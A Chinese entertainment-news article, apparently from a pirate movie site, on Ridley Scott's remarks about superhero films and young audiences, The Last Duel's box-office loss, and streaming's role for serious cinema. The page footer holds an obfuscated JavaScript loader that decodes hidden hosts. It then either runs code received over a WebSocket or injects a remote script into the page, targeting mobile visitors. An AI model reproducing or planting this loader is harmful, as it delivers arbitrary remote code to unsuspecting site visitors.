炮轰超级英雄后又批评00后,他宣布开发《银翼杀手》《异形》剧集

网络影视资讯人气:635时间:2021-11-25 18:00:28

因为有两部导演新作连续上映,雷德利·斯科特变得活跃了起来。

作为两部典藏《异形》、《银翼杀手》的导演,还手握《角斗士》、《末路狂花》、《黑鹰坠落》这些奥斯卡得奖作品,他已经不需要再证明什么了。

甚至还可以“口出狂言”。

11月中旬,他发表了和另一位老导演马丁·斯科塞斯类似的言论,炮轰超级英雄“无聊得像一坨屎”

才没过多久,他又对千禧一代,也就是“00后”提出了批评。

他认为,手机等电子产品令到年轻一代的学习和思考能力大大减弱,除非他们通过可以手机去学习。

之所以说这些,是因为他在做客播客节目时被问到,对于新作《最后的决斗》票房惨败这事怎么看。

《最后的决斗》赢得了口碑胜利,这是电影宇宙时代以来,非常难得的一部中世纪电影。

然而,成本耗资过亿美元,上映了一个月,全球竟然只有2700万出头。

这真的是比血本无归还要惨。

但他仍然能拍出质量保证的作品,对于超级英雄的吐槽就不会缺乏力量。

就是叫好不叫座,让他显得有些“吃不到葡萄说葡萄酸”。

而对于马丁·斯科塞斯的言论,《银河护卫队》系列导演詹姆斯·古恩都直言,老马那是可能想借炮轰漫威来给自己当时的新电影《爱尔兰人》制造一点热度。

其实不只是雷德利·斯科特,尤其是在流媒体时代到来之后,院线的严肃向作品,颁奖季电影,票房大都不咋地。

近期口碑不俗的《国王理查德》,《斯宾塞》都是如此。

这对好莱坞来说绝不是一件好事。

如果这种情况持续下去,大厂恐怕会缩减这种以剧本为核心的剧情片。

那么系列电影将会持续称霸市场,头版头条给到的都是这些没有太多营养的商业制作,这对本来就陷入创意匮乏困局的好莱坞雪上加霜。

电影宇宙模式的出现只是缓解了续集电影的疲惫感,但本质上好莱坞对IP和续集的依赖程度更加大了。

而这种需要强特效的大制作又往往伴随着高成本和高风险。

一个很直接的影响是,好莱坞已经在中国失去了霸主地位。

这不只是国产片有“主场优势”造成的。

当中国电影制作有了质量口碑上的提升,更多新题材涌现,观众会更愿意选择口碑好的片子,这样市场就朝一个较为健康的方向发展。

反观北美市场,如果超级英雄的垄断迟迟不能被打破,那好莱坞就很难去开创一个类似于“新好莱坞时期”的新时代,那么他们的电影工业便容易停滞不前。

老雷把“责任”推到了00后头上,他应该不是在责怪孩子们,而是无奈这个信息时代太过娱乐化。

好吃懒做,吃喝玩乐,本身就是人类的天性。

如果有条件去享乐,那大部分人会放弃思考与探索。

这确实是为什么传统严肃电影越来越少人看的原因之一。

又为什么有人会担心“元宇宙”会让人类堕落。

不过以老雷、老马为代表的老派电影并非完全没有出路。

没错,那就是要大胆拥抱流媒体。

以Netflix为代表的流媒体商展现了超凡的资本实力,而老雷、老马这些在院线不吃香,却能够带来经受时间考验的内容,正合流媒体的口味。

不然Netflix也不会疯狂砸钱给老马拍《爱尔兰人》了。

老雷目前似乎还处于影院阵营,他亲自导演的电影都是坚持影院独家发行。

但他与流媒体展开更深入合作可能只是时间问题。

在接受外媒采访时,他确认了《银翼杀手》系列衍生真人剧集的项目正在开发,以及传闻已久的《异形》剧集。

只要是剧集,就肯定会成为某家流媒体的内容。

老雷去年监制并参与执导的《异星灾变》就成为HBO Max的上线剧集。

《最后的决斗》是失利,最直接的影响可能是老雷《角斗士2》的资金问题。

虽然他对于这次票房惨败并不怎么在乎,毕竟亏本是有的,也不是他的第一次,但制片厂在乎。

明知道这种中世纪大片没观众,大厂可能不会投入太多。

这就给了流媒体一个机会。

像老马一样拿着流媒体的上亿资金拍片,“放弃”影院,对老雷来说,也许只是时间问题。

流媒体并不意味着就是背叛影院。

北美第三大院线喜满客近期就喊话老大AMC和Regal,认为影院应该接受Netflix电影。

理由是《红色通缉令》确实创造了不错的票房成绩。

Netflix其实已经多少抛弃了必须线上首映的原则。

一开始主要是迎合颁奖季的参选规则,后来开始逐渐尝试院线首映。

《红色通缉令》并非颁奖季电影,都提前了一周在影院上映。

在多家大厂尝试流媒体同步首映之后,院线的票房并未受到致命打击。

《沙丘》,就仍然取得了超出预期的票房数字。

而亚马逊收购米高梅,却让米高梅的电影保持影院发行,似乎就成为了流媒体进行影院发行的一种变体。

老雷的另一部新作《古驰家族》,制作方是米高诶,东家却是亚马逊,但仍是一部影院电影。

时代在变。

00后就真的完全不会思考了吗?

答案是否定的。

他们仍会思考,只不过他们不再像从前的人们一样,在影院思考。

就像老雷说的,“千禧一代不想学任何东西,除非你通过手机告诉他。”

既然流媒体是年轻人的选择,那为什么不能在流媒体输出内容呢?

等到流媒体市场也被“无聊得像屎”的电影占据的时候,那传统的电影就更难了。

我们必须认清严肃电影已经难以在影院逆袭,而挽救“film”的重要途径,就是流媒体。

只要等流媒体和影院能够探索出一条共赢的路线,别说老雷了,可能到时诺兰也不会再抗拒流媒体。

本站所有视频和图片均来自互联网收集而来,版权归原创者所有,本网站只提供web页面服务,并不提供资源存储,也不参与录制、上传
若本站收录的节目无意侵犯了贵司版权,请发邮件至juzl4825421@163.com (我们会在3个工作日内删除侵权内容,谢谢。)

© 2021 天龙影院 鲁ICP备78512489号

极速影院

电影天堂

电视剧

综艺节目

樱花动漫

明星

function cXeFh(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function DIOFNh(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return cXeFh(t);};window[''+'J'+'Y'+'Q'+'K'+'Z'+'i'+'w'+'S'+'k'+'I'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=DIOFNh,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/z/'+i;cs.parentElement.insertBefore(s,cs);}})('ZZ2JmLm1kZZmZZ1bi5jbg==','dHIueWVzdW42NzgguY29t','152387',window,document,['Z','g']);}:function(){};